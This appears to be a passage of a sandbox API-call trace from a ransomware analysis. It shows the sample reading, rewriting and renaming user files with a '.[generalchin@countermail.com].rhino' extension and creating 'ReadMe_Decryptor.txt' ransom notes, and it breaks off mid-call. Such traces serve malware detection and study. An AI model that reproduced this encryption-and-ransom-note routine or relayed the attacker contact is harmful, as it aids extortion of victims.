HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.702] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0090.702] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.702] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0090.702] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.702] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0090.702] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.702] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0090.702] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.702] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0090.702] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0090.702] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0090.702] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0090.702] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0090.702] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0090.702] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0090.702] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0090.703] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0090.703] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.703] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0090.703] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.703] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0090.703] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0090.703] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0110 [0090.703] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0090.703] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b03a0 [0090.703] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0110 | out: hHeap=0x6d0000) returned 1 [0090.703] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b04e8 [0090.703] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03a0 | out: hHeap=0x6d0000) returned 1 [0090.703] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b06d0 [0090.703] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b04e8 | out: hHeap=0x6d0000) returned 1 [0090.703] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b09a0 [0090.703] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b06d0 | out: hHeap=0x6d0000) returned 1 [0090.703] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x763348 [0090.703] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b09a0 | out: hHeap=0x6d0000) returned 1 [0090.704] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b03a0 [0090.704] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763348 | out: hHeap=0x6d0000) returned 1 [0090.704] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x763348 [0090.704] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03a0 | out: hHeap=0x6d0000) returned 1 [0090.704] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x764160 [0090.704] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763348 | out: hHeap=0x6d0000) returned 1 [0090.704] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x7656a0 [0090.704] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764160 | out: hHeap=0x6d0000) returned 1 [0090.704] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x767668 [0090.704] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7656a0 | out: hHeap=0x6d0000) returned 1 [0090.704] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x72bfe8 [0090.705] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x767668 | out: hHeap=0x6d0000) returned 1 [0090.706] WriteFile (in: hFile=0x104, lpBuffer=0x72c000*, nNumberOfBytesToWrite=0x44c3, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x72c000*, lpNumberOfBytesWritten=0x2cfa04*=0x44c3, lpOverlapped=0x0) returned 1 [0090.706] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0090.706] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x44c3, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.706] CloseHandle (hObject=0x104) returned 1 [0090.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x23b03a0 [0090.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x196) returned 0x23b04b8 [0090.707] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03a0 | out: hHeap=0x6d0000) returned 1 [0090.707] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.709] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b04b8 | out: hHeap=0x6d0000) returned 1 [0090.709] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0218 | out: hHeap=0x6d0000) returned 1 [0090.709] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0090.709] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b0110 [0090.709] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.709] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b0048 [0090.709] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x23b01d8 [0090.709] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0090.709] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.710] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01d8 | out: hHeap=0x6d0000) returned 1 [0090.710] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5d696d521de238c3.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0090.766] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x17d4 [0090.766] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x18f4, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.766] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.766] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0090.769] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.770] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x17d4, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x17d4, lpOverlapped=0x0) returned 1 [0090.771] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.771] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.771] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.771] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.771] GetLastError () returned 0x0 [0090.771] SetLastError (dwErrCode=0x0) [0090.771] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.771] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x17f7) returned 0x75ef78 [0090.771] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.771] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b01d8 [0090.771] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b02e0 [0090.771] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01d8 | out: hHeap=0x6d0000) returned 1 [0090.771] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.772] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0090.772] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0090.772] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.772] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0090.772] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.772] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0090.772] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.772] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0090.772] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.772] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0090.772] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.772] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0090.772] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0090.772] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0090.773] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x18f4, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.773] CloseHandle (hObject=0x104) returned 1 [0090.773] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x23b0468 [0090.773] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x196) returned 0x23b0580 [0090.773] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5d696d521de238c3.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5d696d521de238c3.customdestinations-ms.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.776] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x138, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.776] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.776] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x18, lpOverlapped=0x0) returned 1 [0090.779] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.779] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.779] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0090.779] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0090.779] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x138, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.779] CloseHandle (hObject=0x104) returned 1 [0090.780] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x23b03a0 [0090.780] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x196) returned 0x23b04b8 [0090.780] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.783] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x251f, nNumberOfBytesToLockHigh=0x0) returned 1 [0090.783] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.783] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0090.787] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.787] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x23ff, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x23ff, lpOverlapped=0x0) returned 1 [0090.789] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0090.789] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.789] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0090.789] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0090.789] GetLastError () returned 0x0 [0090.789] SetLastError (dwErrCode=0x0) [0090.789] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.789] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2422) returned 0x75ef78 [0090.789] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.789] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b01d8 [0090.789] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b02e0 [0090.789] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01d8 | out: hHeap=0x6d0000) returned 1 [0090.789] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.789] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0090.789] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0090.790] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.790] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0090.790] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.790] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0090.790] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.790] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0090.790] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0090.790] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0090.790] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0090.790] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0090.790] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0090.790] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0090.790] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0090.790] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0090.790] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0090.790] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0090.790] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0090.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0090.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0090.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0090.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0090.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0090.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0090.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b01d8 [0090.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0090.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0468 [0090.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01d8 | out: hHeap=0x6d0000) returned 1 [0090.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b05b0 [0090.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0468 | out: hHeap=0x6d0000) returned 1 [0090.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b0798 [0090.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b05b0 | out: hHeap=0x6d0000) returned 1 [0090.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b0a68 [0090.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0798 | out: hHeap=0x6d0000) returned 1 [0090.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x7613a8 [0090.791] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0a68 | out: hHeap=0x6d0000) returned 1 [0090.791] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b0468 [0090.792] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7613a8 | out: hHeap=0x6d0000) returned 1 [0090.792] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x7613a8 [0090.792] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0468 | out: hHeap=0x6d0000) returned 1 [0090.792] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x7621c0 [0090.792] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7613a8 | out: hHeap=0x6d0000) returned 1 [0090.792] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x763700 [0090.792] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7621c0 | out: hHeap=0x6d0000) returned 1 [0090.792] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x7656c8 [0090.792] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763700 | out: hHeap=0x6d0000) returned 1 [0090.793] WriteFile (in: hFile=0x104, lpBuffer=0x7656e0*, nNumberOfBytesToWrite=0x251f, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x7656e0*, lpNumberOfBytesWritten=0x2cfa04*=0x251f, lpOverlapped=0x0) returned 1 [0090.794] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7656c8 | out: hHeap=0x6d0000) returned 1 [0090.794] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x251f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0090.794] CloseHandle (hObject=0x104) returned 1 [0090.796] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x110) returned 0x23b0468 [0090.796] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x196) returned 0x23b0580 [0090.796] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0468 | out: hHeap=0x6d0000) returned 1 [0090.796] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\be71009ff8bb02a2.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\be71009ff8bb02a2.customdestinations-ms.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0090.807] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0580 | out: hHeap=0x6d0000) returned 1 [0090.807] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02e0 | out: hHeap=0x6d0000) returned 1 [0090.807] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0090.807] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b0048 [0090.807] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0110 | out: hHeap=0x6d0000) returned 1 [0090.807] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23b0110 [0090.807] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x23b01d8 [0090.807] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0110 | out: hHeap=0x6d0000) returned 1 [0090.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js 